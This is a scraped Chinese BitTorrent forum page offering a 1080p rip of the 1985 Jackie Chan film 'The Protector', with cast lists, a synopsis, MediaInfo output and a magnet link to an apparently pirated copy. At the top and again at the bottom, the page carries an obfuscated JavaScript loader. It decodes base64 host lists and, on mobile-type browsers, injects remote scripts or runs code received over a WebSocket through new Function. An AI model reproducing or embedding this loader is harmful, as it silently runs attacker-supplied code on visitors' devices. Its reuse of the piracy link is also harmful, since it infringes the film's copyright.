威龙猛探[国粤语音轨/简繁字幕].The.Protector.1985.BluRay.1080p.3Audio.DTS-HD.MA5.1.x265.10bit 9.99GB

版主小s 1月前 400

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 威龙猛探 / The Protector

◎片 名 威龍猛探

◎年 代 1985

◎产 地 中国香港 / 美国

◎类 别 剧情 / 动作 / 犯罪

◎语 言 英语 / 粤语

◎上映日期 1985-07-11

◎IMDb链接 https://www.imdb.com/title/tt0089847/

◎豆瓣评分 6.3/10 (4099人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304199/

◎片 长 91分钟

◎导 演 詹姆斯·格利肯豪斯 James Glickenhaus (id:1023234)

◎编 剧 詹姆斯·格利肯豪斯 James Glickenhaus (id:1023234)

◎演 员 成龙 Jackie Chan (id:1054531)

丹尼·爱罗 Danny Aiello (id:1019050)

维克多·阿诺德 Victor Arnold (id:1010156)

基姆·贝斯 Kim Bass (id:1005544)

Jesse Cameron-Glickenhaus Jesse Cameron-Glickenhaus (id:1071064)

乔宏 Roy Chiao (id:1032432)

Richard Clarke Richard Clarke (id:1078659)

Richard Epper Richard Epper (id:1283247)

贝琦·安·贝克 Becky Ann Baker (id:1057803)

Alan Gibbs Alan Gibbs (id:1092699)

李赛凤 Moon Lee (id:1005495)

乔·马鲁佐 Joe Maruzzo (id:1340263)

Ron Parady Ron Parady (id:1134368)

约翰·斯宾塞 John Spencer (id:1154416)

迈克·斯塔尔 Mike Starr (id:1025280)

Big John Studd Big John Studd (id:1150024)

比尔·华莱士 Bill Wallace (id:1161455)

特雷·威尔逊 Trey Wilson (id:1005033)

冯克安 Hark-On Fung (id:1283563)

詹姆斯·格利肯豪斯 James Glickenhaus (id:1023234)

约翰·拉达尔斯基 John Ladalski (id:1102953)

李海生 Hoi Sang Lee (id:1274574)

麦德罗 Te-Lo Mai (id:1329552)

沈威 Wai Shum (id:1297537)

保罗·L·史密斯 Paul L. Smith (id:1009173)

杨群 Peter Yang Kwan (id:1317338)

叶倩文 Sally Yeh (id:1028614)

钟荣 Chung Wing (id:1432989)

何冠昌 Leonard Ho (id:1286717)

陈锡康 David Chan (id:1280433)

张耀宗 Peter Cheung (id:1280650)

Peggy Farrell Peggy Farrell (id:1283469)

Carla White Carla White (id:1300794)

陈可辛 Peter Chan (id:1274300)

方保罗 Paul Fonoroff (id:1325637)

周少龙 Shao Lung Chou (id:1344862)

◎标 签 成龙 / 动作 / 香港 / 香港电影 / 美国 / 1985 / 功夫 / 喜剧

◎简 介

当夜色笼罩纽约,这里又变成了一座犯罪猖獗的城市。华人警察黄比利(成龙 饰)和同事来到酒吧庆祝来美十周年,不料同事却被一群闯入的劫匪杀死,愤怒的比利将凶手正法,因此激怒了上司,被惩罚性质的派到大亨沙比路的时装展上维持治安,表演期间,沙比路的女儿罗娜被一群人劫走,而沙比路的保镖宾尼事发前曾向香港打过多个电话,种种迹象表明,沙比路和香港头号毒枭高伟洛(乔宏 饰)有过合作,而二人产生争执可能导致这次的绑架。比利和搭档丹尼(丹尼·埃洛 Danny Aiello 饰)前往香港,在这里找到了高伟洛昔日两名合作伙伴李兴以及何天的女儿何美芳(叶倩文 饰),希望对方能够提供线索。高伟洛迅速派人追杀比利和丹尼,以及昔日的合作伙伴。比利冲破重重阻碍,查清了高伟洛的巢穴,带领搭档向高发起了猛攻……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 317510745468587055164674431608155380981 (0xEEDE5861676A4BDF881F783C08D59CF5)

  4. Complete name : The.P[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.98 GiB

  8. Duration : 1 h 35 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.0 Mb/s

  11. Encoded date : UTC 2021-10-16 16:36:01

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 35 min

  21. Bit rate : 11.3 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.237

  31. Stream size : 7.53 GiB (75%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 11305 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / total-frames=137224 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=21.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 35 min

  49. Bit rate mode : Variable

  50. Bit rate : 2 365 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 1.58 GiB (16%)

  58. Title : English DTS-HD Master Audio 5.1 @ 2364 Kbps

  59. Language : English

  60. Default : No

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 35 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 437 MiB (4%)

  77. Title : Cantonese Dolby Digital Audio 5.1 @ 640 kbps

  78. Language : Chinese

  79. Service kind : Complete Main

  80. Default : Yes

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : AC-3

  85. Format/Info : Audio Coding 3

  86. Commercial name : Dolby Digital

  87. Codec ID : A_AC3

  88. Duration : 1 h 35 min

  89. Bit rate mode : Constant

  90. Bit rate : 640 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 437 MiB (4%)

  97. Title : Mandarin Dolby Digital Audio 5.1 @ 640 kbps

  98. Language : Chinese

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Text #1

  103. ID : 5

  104. Format : PGS

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 51 min 34 s

  108. Bit rate : 1 908 b/s

  109. Count of elements : 72

  110. Stream size : 721 KiB (0%)

  111. Title : Eng/SUP

  112. Language : English

  113. Default : Yes

  114. Forced : No


  115. Text #2

  116. ID : 6

  117. Format : PGS

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 29 min

  121. Bit rate : 15.8 kb/s

  122. Count of elements : 1177

  123. Stream size : 10.1 MiB (0%)

  124. Title : Chs/SUP 简体

  125. Language : Chinese

  126. Default : No

  127. Forced : No


  128. Text #3

  129. ID : 7

  130. Format : PGS

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 29 min

  134. Bit rate : 16.6 kb/s

  135. Count of elements : 1177

  136. Stream size : 10.6 MiB (0%)

  137. Title : Cht/SUP 繁体

  138. Language : Chinese

  139. Default : No

  140. Forced : No


  141. Menu

  142. 00:00:00.000 : en:Chapter 01

  143. 00:06:34.185 : en:Chapter 02

  144. 00:17:48.734 : en:Chapter 03

  145. 00:28:50.771 : en:Chapter 04

  146. 00:40:18.750 : en:Chapter 05

  147. 00:50:21.227 : en:Chapter 06

  148. 01:02:46.638 : en:Chapter 07

  149. 01:15:54.800 : en:Chapter 08

  150. 01:23:42.226 : en:Chapter 09

  151. 01:30:38.683 : en:Chapter 10




复制代码


TAGS 动作 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:968564672EF4B205C6A91794137FA40FD7E08703

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (1)
  • Leon612 1月前
    2
    啥也不说了,感谢楼主分享哇!

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};